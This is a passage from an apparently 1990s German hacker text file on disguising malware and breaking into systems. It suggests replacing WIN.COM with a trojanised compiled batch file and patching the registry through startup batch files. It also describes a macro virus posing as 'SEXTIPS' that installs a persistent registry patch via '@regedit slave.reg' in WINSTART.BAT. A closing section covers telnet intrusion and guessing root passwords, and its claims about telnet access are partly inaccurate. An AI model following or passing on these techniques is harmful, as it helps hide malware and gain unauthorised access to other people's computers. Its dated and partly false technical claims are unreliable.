Da WIN.COM nichts anders tut, als das offiziele MS-Windows-Logo aufzurufen und den eigentlichen DOS-Extender WIN386.EXE zu starten, kann man sie durch eine WIN.BAT oder (unauffälliger) durch eine COMpelierte Version der BAT ersetzen, die das Logo darstellt, einige andere Dinge treibt und dann WIN386.EXE startet. Eine bessere Tarnung als eine korrupte WIN.COM gibt es (fast) nicht.

5. Windows Registry

Die Registry (bestehehend aus REG.DAT, USER.DAT und SYSTEM.DAT) ist hervorragend für Manipulationen geeignet. Besonders bei Windows95, da REGEDIT dort einen DOS-Stub besitzt, der Manipulationen über Batch-Dateien wie z.B. WINSTART.BAT oder AUTOEXEC.BAT/ASCII255.BAT äußerst einfach macht. Theorethisch wären sogar (kleinere) Veränderungen über primitive ANSI-Bomben denkbar.

Unter Windows 3.1x muß man Windows schon geladen haben; außerdem wird der Anwender dort mit einer Nachricht "Die Informationen in C:\WIN\SLAVE.REG wurden erfolgreich in der Registrierdatenbank registriert" gelangweilt.

6. Makrovorlagen

Durch die starke Verbreitung der Dokumenviren sind Makrovorlagen von Standardanwendungen als Viren-Träger inzwischen allgemein bekannt. Die Funktionalität dieser Makrovorlagenviren hängt von der jeweiligen Anwendung ab, ist aber meist äußert umfassend. Eine langlebige Tarnung ist allerdings bei einigermassen informierten Anwendern kaum zu erwarten.

7. Divine Combination

Mit Kombinationen kann man im Endeffekt am meisten erreichen, z.B.: Ein als SEXTIPS getarnter Makro-Virus transportiert einen Registry-Patch, der über eine neue Kommandozeile in der WINSTART.BAT (etwa "@regedit slave.reg") dauerhaft installiert wird und von normalen Blindgängern kaum mehr zu beseitigen ist.



3. Hacken im Internet



Jeder Benutzer des Internets bekommt vom TCP/IP-Protokoll eine leicht herausfindbare Nummer (ewta 194.142.255.123) zugewiesen. Man kann sich mit Telnet auf jeden PC einloggen, dessen Nummer man kennt (dazu benutzt man in der Regel Telnet). Wie und ob es funktioniert, hängt davon, wie das Fremd-System eingestellt ist. Unter einem Windows-System gerät man so ins DFÜ-Netzwerk und kann die gegebenen Zugangsrechte beanspruchen, die man mit den bekannten Tricks ausweiten kann. Unter Unix kann man sich meist als "Guest" anmelden (mit wenigen Rechten) oder man kann den Root-Account hacken (dann hat man alle Rechte), indem man z.B. das Paßwort erraten kann (Unix zu hacken ist SEHR kompliziert). Das alles funktioniert - natürlich - nur so lange, wie das System mit dem Internet verbunden ist.



Wer Rechtschreibfehler korrigiert oder nachmacht oder sich
korrigierte oder nachgemachte Rechtschreibfehler verschafft oder
korrigierte oder nachgemachte Rechtschreibfehler in Umlauf bringt
wird mit Kelly Family-Musik nicht unter 2 Jahren Dauer bestraft!!!